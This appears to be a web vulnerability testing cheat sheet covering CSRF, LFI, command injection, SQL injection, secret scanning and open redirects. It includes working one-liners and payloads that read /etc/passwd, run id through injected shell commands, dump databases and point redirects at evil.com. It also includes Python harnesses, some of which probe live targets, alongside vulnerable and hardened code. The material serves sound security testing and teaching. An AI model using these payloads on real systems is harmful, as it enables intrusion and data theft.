Vulnerability Testing Techniques


Phirojshah

Cross-Site Request Forgery (CSRF)

Purpose: Test whether state-changing requests (form posts, account changes, purchases) can be forged from a third-party origin and executed with the victim's session.

Detection:

cat live_websites.txt | gf csrf | tee csrf_endpoints.txt

Manual Testing Steps:

Identify forms and state-changing endpoints.
Check for the presence of CSRF tokens (hidden form field or custom request header).
Test token validation mechanisms: remove the token, submit an empty or malformed one, and check that the response differs from a valid submission.
Attempt bypass techniques such as token reuse (a token issued to your own session), dropping or spoofing the Origin/Referer headers, or switching the request method.
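
The validation steps above, as an added example that is not from the original article: a Python model of the server-side check, with a vulnerable validator that only tests for the presence of a token beside a synchronizer-token validator, and the manual bypass probes (missing token, token reuse, cross-origin request, missing Origin header) run against both. The origin https://target.example, the attacker page https://attacker.example and the tokens are hypothetical.

```python
import hmac
import secrets
from dataclasses import dataclass
from typing import Callable, Dict, Optional

# Hypothetical site origin and two sessions: the victim's and the attacker's own.
SITE_ORIGIN = "https://target.example"
VICTIM_TOKEN = secrets.token_hex(16)     # CSRF token bound to the victim's session
ATTACKER_TOKEN = secrets.token_hex(16)   # a valid token the attacker got from their own session


@dataclass
class Request:
    """A state-changing POST as the server sees it."""
    session_token: str          # token the server stored for the requesting session
    form_token: Optional[str]   # token carried in the request body (None if absent)
    origin: Optional[str]       # Origin header (None if the browser sent none)


def weak_check(req: Request) -> bool:
    """Vulnerable validation: accepts any non-empty token, so a token taken from
    the attacker's own session passes ("token reuse")."""
    return bool(req.form_token)


def hardened_check(req: Request) -> bool:
    """Synchronizer-token validation: the submitted token must equal the one bound
    to this session (constant-time compare) and a present Origin must be our own."""
    if req.form_token is None:
        return False
    if not hmac.compare_digest(req.form_token, req.session_token):
        return False
    if req.origin is not None and req.origin != SITE_ORIGIN:
        return False
    return True


def bypass_probes() -> Dict[str, Request]:
    """The bypass attempts from the manual steps, as requests a page on
    https://attacker.example could make the victim's browser send."""
    attacker = "https://attacker.example"
    return {
        "missing_token": Request(VICTIM_TOKEN, None, attacker),
        "token_reuse": Request(VICTIM_TOKEN, ATTACKER_TOKEN, attacker),
        # Right token but cross-origin (e.g. a token leaked elsewhere)
        "cross_origin_with_token": Request(VICTIM_TOKEN, VICTIM_TOKEN, attacker),
        # Some clients omit Origin entirely; the token alone must still carry the check
        "no_origin_header": Request(VICTIM_TOKEN, ATTACKER_TOKEN, None),
        "legitimate": Request(VICTIM_TOKEN, VICTIM_TOKEN, SITE_ORIGIN),
    }


def run_probes(check: Callable[[Request], bool]) -> Dict[str, bool]:
    """Map each probe name to whether the given validator accepted it."""
    return {name: check(req) for name, req in bypass_probes().items()}


if __name__ == "__main__":
    for name, check in (("weak", weak_check), ("hardened", hardened_check)):
        print(name, run_probes(check))
```

Against a real target you do not see the server's code, but the observable is the same: send each probe with the victim's cookies and compare status and body with the legitimate request. A validator that behaves like weak_check accepts the token-reuse probe, which is the finding.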

Local File Inclusion (LFI)

Purpose: Identify file inclusion flaws where a user-controlled path reaches an include or file-read call, allowing sensitive server files such as /etc/passwd to be read.

Detection:

# Prints the vulnerable URL itself rather than the matching line, so the result file is usable
cat live_websites.txt | gf lfi | qsreplace "../../../../etc/passwd" | xargs -I@ sh -c 'curl -s "@" | grep -q "^root:x:0:0:" && echo "@"' | tee lfi_results.txt

Common Payloads:

# Basic traversal (increase the number of ../ until the include root is reached)
../../../etc/passwd
# Null byte truncation: strips an extension the application appends, such as .php (PHP < 5.3.4 only)
../../../etc/passwd%00
# Double URL encoding, for targets that decode the parameter twice or filter only single-encoded "../"
..%252f..%252f..%252fetc%252fpasswd
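
An added example (not part of the original page) that turns the one-liner and payload list into a small Python harness: it generates the three payload families at increasing traversal depth, and classifies responses with a signature anchored to the first line of /etc/passwd so that a page merely mentioning root:x: is not reported. The target URL https://target.example/index.php?page= and the sample responses are constructed for the example.

```python
import re
import urllib.error
import urllib.request
from typing import Dict, List
from urllib.parse import quote

# Hypothetical target; the parameter value is replaced by each payload.
TARGET_PREFIX = "https://target.example/index.php?page="

# First line of /etc/passwd is "root:x:0:0:..." (some systems use "*" or an empty
# password field). Anchoring to the line start and to uid/gid 0 avoids matching a
# page that merely contains the text "root:x:".
PASSWD_SIGNATURE = re.compile(r"^root:[x*]?:0:0:", re.MULTILINE)


def traversal_payloads(target_file: str = "etc/passwd", max_depth: int = 6) -> List[str]:
    """Generate the three payload families from the list above at increasing
    traversal depth, since the include directory's depth is unknown up front."""
    payloads = []
    for depth in range(1, max_depth + 1):
        plain = "../" * depth + target_file
        payloads.append(plain)                                  # basic traversal
        payloads.append(plain + "%00")                          # null byte (PHP < 5.3.4)
        payloads.append(quote(quote(plain, safe=""), safe=""))  # double URL encoding
    return payloads


def looks_like_passwd(body: str) -> bool:
    """True when the response body contains what looks like /etc/passwd."""
    return PASSWD_SIGNATURE.search(body) is not None


def classify(responses: Dict[str, str]) -> List[str]:
    """Given {payload: response body}, return the payloads that leaked the file."""
    return [p for p, body in responses.items() if looks_like_passwd(body)]


def fetch(url: str, timeout: float = 10.0) -> str:
    """Fetch a URL and return the body as text. Error pages are returned too,
    since a 500 response can still contain the included file."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("utf-8", "replace")


def probe(prefix: str = TARGET_PREFIX) -> List[str]:
    """Live version of the one-liner: try every payload and report the hits."""
    return classify({p: fetch(prefix + p) for p in traversal_payloads()})


# Constructed responses standing in for what curl would return, so the
# classification can be checked offline.
SAMPLE_RESPONSES = {
    "../../../etc/passwd":
        "<b>Warning</b>: include(../../../etc/passwd): failed to open stream",
    "../../../../etc/passwd":
        "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n",
    "../../../../etc/passwd%00":
        "root:x:0:0:root:/root:/bin/bash\n",
    "..%252f..%252fetc%252fpasswd":
        "Search results for 'root:x:' - no documents found",  # a bare grep "root:x:" would flag this
}

if __name__ == "__main__":
    print(classify(SAMPLE_RESPONSES))
```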

Remote Code Execution (RCE)

Purpose: Detect and exploit flaws such as unrestricted file upload and OS command injection that allow arbitrary code or commands to run on the server.

Upload Testing:

# After uploading, request the file from its stored location: it is only RCE if the server executes it rather than serving it as text
curl -X POST -F "file=@exploit.php" https://target.com/upload

Command Injection Test:

# Basic tests: append to a parameter that reaches a shell; "uid=" in the response confirms execution
;id
|id
`id`
$(id)
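
An added Python example, not from the original article, showing why the four probes work and what the fix looks like: the vulnerable sink passes user input to /bin/sh through shell=True, the hardened one passes it as a single argv element, and each probe is judged by whether the id canary's uid= output appears. echo stands in for whatever command the application actually runs.

```python
import subprocess
from typing import Callable, Dict

# The four probe strings from the list above; "id" is the canary command whose
# "uid=" output proves execution.
PAYLOADS = [";id", "|id", "`id`", "$(id)"]


def vulnerable_echo(user_input: str) -> str:
    """Vulnerable pattern: user input spliced into a command line run by /bin/sh
    (shell=True), so ; | backticks and $( ) are interpreted by the shell."""
    proc = subprocess.run("echo " + user_input, shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def hardened_echo(user_input: str) -> str:
    """Hardened pattern: argv list, no shell. The same bytes reach echo as one
    literal argument and are printed back unchanged."""
    proc = subprocess.run(["echo", user_input], capture_output=True, text=True)
    return proc.stdout


def command_executed(output: str) -> bool:
    """Detection: the canary's output shows up in the response."""
    return "uid=" in output


def run_payloads(sink: Callable[[str], str]) -> Dict[str, bool]:
    """Feed every payload to a sink and record whether the canary executed."""
    return {p: command_executed(sink(p)) for p in PAYLOADS}


if __name__ == "__main__":
    print("vulnerable:", run_payloads(vulnerable_echo))
    print("hardened:  ", run_payloads(hardened_echo))
```

For blind injection, where the command's output never reaches the response, swap the canary for a delay (for example ;sleep 5) and compare response times instead of searching the body.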

SQL Injection (SQLi)

Purpose: Detect SQL injection, where user input is parsed as part of a query, in order to read or manipulate the database.

Automated Testing:

ghauri -u "https://target.com?id=1" --dbs --batch

Manual Testing Payloads:

# Unbalanced quote: a database error or a changed response shows the input reaches a query
'
# Tautology: returns every row
' OR '1'='1
# Column-count probe: add NULLs until the error disappears
' UNION SELECT NULL--
# Version banner (MySQL/MSSQL syntax; use version() on PostgreSQL, sqlite_version() on SQLite)
' UNION SELECT @@version--
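
The manual payloads above, worked through against a constructed SQLite database in Python (an added example, not the article's own code): the vulnerable lookup concatenates input into the query text, the safe one binds a parameter. @@version is MySQL/MSSQL syntax, so sqlite_version() stands in for it here, and a final payload shows the column-count probe turned into data extraction.

```python
import sqlite3
from typing import List, Tuple, Union


def build_db() -> sqlite3.Connection:
    """Constructed in-memory database standing in for the target's backend."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, secret TEXT);
        INSERT INTO users VALUES (1, 'alice', 'alice-secret');
        INSERT INTO users VALUES (2, 'bob', 'bob-secret');
    """)
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, user_id: str) -> List[Tuple]:
    """Vulnerable: the value is concatenated into the SQL text, so a quote in the
    input closes the literal and the rest is parsed as SQL."""
    sql = "SELECT id, username FROM users WHERE id = '" + user_id + "'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, user_id: str) -> List[Tuple]:
    """Hardened: the value travels as a bound parameter and is never parsed as SQL."""
    return conn.execute("SELECT id, username FROM users WHERE id = ?", (user_id,)).fetchall()


def probe(conn: sqlite3.Connection, payload: str) -> Tuple[str, Union[int, str]]:
    """What a tester observes per payload: ('error', message) or ('rows', count)."""
    try:
        return ("rows", len(vulnerable_lookup(conn, payload)))
    except sqlite3.OperationalError as err:
        return ("error", str(err))


# The manual payloads from the list above, with sqlite_version() in place of @@version.
PAYLOADS = [
    "'",                                            # unbalanced quote -> SQL error
    "' OR '1'='1",                                  # tautology -> every row
    "' UNION SELECT NULL--",                        # wrong column count -> error
    "' UNION SELECT NULL,NULL--",                   # right column count -> one extra row
    "' UNION SELECT sqlite_version(),NULL--",       # version banner
    "' UNION SELECT username,secret FROM users--",  # pull secrets out through the UNION
]


def walk(conn: sqlite3.Connection) -> List[Tuple[str, str, Union[int, str]]]:
    """Run every payload and return (payload, kind, detail) triples."""
    return [(p,) + probe(conn, p) for p in PAYLOADS]


if __name__ == "__main__":
    db = build_db()
    for payload, kind, detail in walk(db):
        print(f"{payload!r:48} -> {kind}: {detail}")
    print("safe lookup with tautology:", safe_lookup(db, "' OR '1'='1"))
```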

Sensitive Data Exposure

Purpose: Identify sensitive data such as API keys, cloud credentials or private keys left in client-side JavaScript and other reachable files.

JavaScript Analysis:

# js_files.txt holds one JavaScript URL per line: download the files first, then grep their contents (grepping the URL list itself finds nothing)
mkdir -p js && wget -q -P js -i js_files.txt
grep -rEino ".{0,40}(key|token|auth|password).{0,60}" js/ > sensitive_data.txt

Common Patterns:

# Generic 32-character tokens (noisy: also matches MD5 hashes and asset IDs, so review hits by hand)
[A-Za-z0-9]{32}
# AWS access key IDs (the matching secret access key is usually close by)
AKIA[0-9A-Z]{16}
# PEM private keys (RSA, EC, OPENSSH; PKCS#8 headers read "BEGIN PRIVATE KEY" with no algorithm word and need a looser pattern)
-----BEGIN [A-Z]+ PRIVATE KEY-----
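
An added Python scanner, not from the original article, that applies the patterns above to a constructed JavaScript sample, plus a keyword-context pattern equivalent to the grep. It shows the 32-character pattern also matching an innocent MD5 hash, and widens the private-key pattern so PKCS#8 headers (no algorithm word) are caught too. The sample bundle and the file name app.js are constructed; AKIAIOSFODNN7EXAMPLE is the placeholder key ID from AWS's own documentation.

```python
import re
from typing import Dict, List, Tuple

# The patterns from the list above plus a keyword-context pattern matching the
# grep. The private-key pattern is widened so "BEGIN PRIVATE KEY" (PKCS#8, no
# algorithm word) is caught as well as "BEGIN RSA PRIVATE KEY".
PATTERNS = {
    "generic_32": re.compile(r"\b[A-Za-z0-9]{32}\b"),          # noisy: also hits hashes
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key": re.compile(r"-----BEGIN (?:[A-Z]+ )?PRIVATE KEY-----"),
    "keyword_context": re.compile(
        r"""(?i)\b(?:api[_-]?key|secret|token|auth|password)\b\s*[:=]\s*["']([^"']+)["']"""),
}


def scan(text: str) -> Dict[str, List[str]]:
    """Return every match per pattern (for keyword_context, the captured value)."""
    return {name: pat.findall(text) for name, pat in PATTERNS.items()}


def scan_lines(text: str, source: str) -> List[Tuple[str, int, str, str]]:
    """Line-oriented report (source, line number, pattern, match): what you want
    in sensitive_data.txt instead of bare matches with no location."""
    report = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pat in PATTERNS.items():
            for m in pat.finditer(line):
                report.append((source, lineno, name, m.group(m.lastindex or 0)))
    return report


# Constructed sample bundle for this example, not taken from any real site.
SAMPLE_JS = """\
// constructed sample bundle for this example
const cfg = {
  apiKey: "AbCdEf0123456789AbCdEf0123456789",
  awsKey: "AKIAIOSFODNN7EXAMPLE",
  password: "hunter2",
};
const assetHash = "d41d8cd98f00b204e9800998ecf8427e"; // md5 of a file, not a secret
const pem = `-----BEGIN RSA PRIVATE KEY-----
MIIEvQIBADANBg...
-----END RSA PRIVATE KEY-----`;
const pkcs8 = "-----BEGIN PRIVATE KEY-----";
"""

if __name__ == "__main__":
    for entry in scan_lines(SAMPLE_JS, "app.js"):
        print("%s:%d [%s] %s" % entry)
```

The generic_32 hit on assetHash is the false-positive class the comment on that pattern warns about; the keyword_context pattern is the better first pass, and the AWS and PEM patterns are precise enough to report directly.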

Open Redirect

Purpose: Test whether a redirect parameter can be pointed at an attacker-controlled URL, so that users following a link on the trusted domain land on a malicious site.

Detection:

# Prints the vulnerable URL; a hit only proves evil.com appears in the Location header, so confirm the redirect host really is evil.com before reporting
cat urls.txt | grep "=http" | qsreplace "https://evil.com" | xargs -I@ sh -c 'curl -sI "@" | grep -iq "^location:.*evil\.com" && echo "@"' | tee redirect_results.txt

Test Payloads:

https://evil.com
# Protocol-relative form, for filters that only block "http"
//evil.com
# Backslashes are treated as slashes by browsers
\/\/evil.com
# URL-encoded slashes, for filters that check the value before it is decoded
%2F%2Fevil.com
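
An added Python example, not part of the original article, that decides where a browser would actually land for a given Location header instead of grepping for the string: backslashes count as slashes and any run of leading slashes starts an authority, as in WHATWG URL parsing for http/https, while an undecoded %2F%2F stays a same-origin path. It goes beyond the page's four payloads to show a userinfo trick and a subdomain lookalike as well. The endpoint https://target.example/login?next= and the sample Location values are constructed; the live helper fetch_location uses urllib without following redirects.

```python
import re
import urllib.error
import urllib.request
from typing import Dict, Optional
from urllib.parse import urlsplit

ATTACKER_HOST = "evil.com"   # the host from the payload list
# Hypothetical vulnerable endpoint; ?next= is the parameter under test.
TARGET_URL = "https://target.example/login?next="

PAYLOADS = [
    "https://evil.com",
    "//evil.com",
    "\\/\\/evil.com",        # \/\/evil.com on the wire
    "%2F%2Fevil.com",
]


def browser_host(location: str) -> Optional[str]:
    """Approximate where a browser lands for a Location value: backslashes act as
    slashes and any run of two or more leading slashes (or an http(s): scheme)
    starts an authority; the host is returned. None means same-origin."""
    loc = location.strip().replace("\\", "/")
    m = re.match(r"^(?:(https?):)?(/*)(.*)$", loc, flags=re.I)
    scheme, slashes, rest = m.groups()
    if scheme or len(slashes) >= 2:
        return urlsplit("//" + rest).hostname
    return None


def redirects_offsite(location: str, attacker: str = ATTACKER_HOST) -> bool:
    """True only when the redirect host is the attacker host (or a subdomain of
    it), not when the string merely appears somewhere in the URL."""
    host = browser_host(location)
    return host is not None and (host == attacker or host.endswith("." + attacker))


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None   # make urllib raise HTTPError instead of following the redirect


def fetch_location(url: str, timeout: float = 10.0) -> Optional[str]:
    """Live probe: return the Location header the endpoint answers with, if any."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(url, timeout=timeout) as resp:
            return resp.headers.get("Location")
    except urllib.error.HTTPError as err:
        return err.headers.get("Location")


def probe(target: str = TARGET_URL) -> Dict[str, bool]:
    """Send every payload and report which ones actually leave the site."""
    results = {}
    for p in PAYLOADS:
        loc = fetch_location(target + p)
        results[p] = loc is not None and redirects_offsite(loc)
    return results


def classify(locations: Dict[str, str]) -> Dict[str, bool]:
    """Offline classification of {case: Location header value}."""
    return {name: redirects_offsite(loc) for name, loc in locations.items()}


# Constructed Location headers as different endpoints might answer.
SAMPLE_LOCATIONS = {
    "absolute": "https://evil.com",
    "protocol-relative": "//evil.com",
    "backslashes": "\\/\\/evil.com",
    "%2F%2F decoded by server": "//evil.com",
    "%2F%2F left encoded": "/%2F%2Fevil.com",           # same-origin path, grep would still match
    "reflected in query only": "https://target.example/login?next=https://evil.com",
    "subdomain lookalike": "//evil.com.target.example",  # stays on target
    "userinfo trick": "//target.example@evil.com",       # really goes to evil.com
}

if __name__ == "__main__":
    for name, verdict in classify(SAMPLE_LOCATIONS).items():
        print(f"{name:28} offsite={verdict}")
```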

Report Contents:

Steps to reproduce.
Impact assessment.
Affected endpoints.
Proof of concept.
Suggested fixes.

Severity Factors:

Exploitability.
Technical impact.
Business impact.
Required access level.
Complexity of exploitation.